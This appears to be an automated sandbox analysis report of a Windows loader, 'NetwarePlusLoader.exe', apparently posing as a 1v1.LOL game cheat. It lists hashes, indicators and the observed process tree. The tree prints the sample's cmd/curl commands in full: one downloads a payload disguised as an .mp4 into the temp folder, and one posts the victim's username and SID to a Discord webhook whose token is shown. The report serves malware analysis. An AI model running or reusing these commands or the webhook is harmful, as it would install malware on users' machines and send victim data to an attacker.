05df9a3930acdd99f5d5f5420e33a3f0cb35c50da8d2b7f36b52c6f56230e307

Analysis

max time kernel
121s
max time network
147s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
14/07/2024, 10:51

Target

NetwarePlusLoader.exe
Size

190KB
MD5

3aee5f71b6ba6b81fa54ff3d5bfd30e0
SHA1

5e0c48c23895cf097fcce62cc9d73db55d6fb605
SHA256

05df9a3930acdd99f5d5f5420e33a3f0cb35c50da8d2b7f36b52c6f56230e307
SHA512

a6c97e8905002ae7e4dba759f2b871fff87a9d730576963914e3336ebc4c402c711e03c5bc086f1e2027fc9bf9fe9913cf30935e4048579f223296041ab340af
SSDEEP

3072:lv69ZK/pWcANFVJ9pVe7DRIClM8H3c8yR7k6tX00bgUql:lv69ZK/pWcANFVJ9pVe7DRXlds8g7Ptz

Score

1^/10

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2356	NetwarePlusLoader.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2356 wrote to memory of 3056	2356	NetwarePlusLoader.exe	33
PID 2356 wrote to memory of 3056	2356	NetwarePlusLoader.exe	33
PID 2356 wrote to memory of 3056	2356	NetwarePlusLoader.exe	33
PID 2356 wrote to memory of 3056	2356	NetwarePlusLoader.exe	33
PID 2356 wrote to memory of 2704	2356	NetwarePlusLoader.exe	35
PID 2356 wrote to memory of 2704	2356	NetwarePlusLoader.exe	35
PID 2356 wrote to memory of 2704	2356	NetwarePlusLoader.exe	35
PID 2356 wrote to memory of 2704	2356	NetwarePlusLoader.exe	35

C:\Users\Admin\AppData\Local\Temp\NetwarePlusLoader.exe
"C:\Users\Admin\AppData\Local\Temp\NetwarePlusLoader.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2356
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Dropper.mp4?v=1720953874596 --output %temp%\childlover.exe
  2⤵
  PID:3056
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c curl "https://discord.com/api/webhooks/1253698648257331411/L0Gb25A61e5G82Iq8Fne61WHla2fpQ9qB4rmcg6N7SlZixH4Kdr3tU27ilVxLwzmFpZT" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone\nSomeone Injected!\nAdmin | S-1-5-21-1385883288-3042840365-2734249351-1000"",""embeds"":null,""avatar_url"":""https://cdn.discordapp.com/avatars/1191678925055737867/9af2e220817c7d8265ce700fba05e989.webp?size=1024&format=webp&width=0&height=256"",""attachments"":[]}"
  2⤵
  PID:2704

C:\steamapps\common\1v1.LOL\.doorstop_version

Filesize
5B

MD5
495063beeac89309a2247ce9c13ed292

SHA1
063ee00ca80d81e068dd404b59ceb2a03b2e7109

SHA256
b4116d6e880009dc1440ddab7ec054bcea529aea394ec5bab7943b415a359281

SHA512
cac6de984822cd7cf97611897611873cb5951b9a63f75a46a54aa6c0d2f3565419a1aa574c657df94a7057d85b99515753615b7336d96a7ff9463a0f3dbf3ffa

Download Submit
memory/2356-0-0x00000000746FE000-0x00000000746FF000-memory.dmp

Filesize
4KB

Download
memory/2356-1-0x0000000000EB0000-0x0000000000EE6000-memory.dmp

Filesize
216KB

Download
memory/2356-2-0x00000000746F0000-0x0000000074DDE000-memory.dmp

Filesize
6.9MB

Download
memory/2356-3-0x00000000746FE000-0x00000000746FF000-memory.dmp

Filesize
4KB

Download
memory/2356-4-0x00000000746F0000-0x0000000074DDE000-memory.dmp

Filesize
6.9MB

Download